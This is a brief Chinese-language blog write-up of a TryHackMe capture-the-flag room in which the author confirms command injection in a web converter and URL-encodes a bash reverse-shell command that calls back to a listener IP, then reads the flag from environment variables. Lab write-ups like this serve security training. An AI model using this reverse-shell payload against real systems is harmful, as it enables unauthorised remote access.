TryHackMe-epoch

发布于 2022-10-30  1599 次阅读


题目很明确,告诉了是个命令注入

直接开环境访问

网站是个转换工具
抓包来测试是否存在命令注入
首先得使用tcpdump来监听网卡
但因为我用的是工具箱的kali,会一直有通信,所以需要先进行一个过滤,这里为了方便我过滤的是来源网站IP的数据包

构造命令注入,尝试ping这台kali
成功收到请求

接着开始尝试反弹shell

bash -i >& /dev/tcp/10.10.78.194/3333 0>&1

这里进行了一个url编码,拼接

成功反弹回shell

找了半天没找到flag,看了下提示

直接env查看用户环境变量

难怪find了半天文件没找到--

届ける言葉を今は育ててる
最后更新于 2022-10-30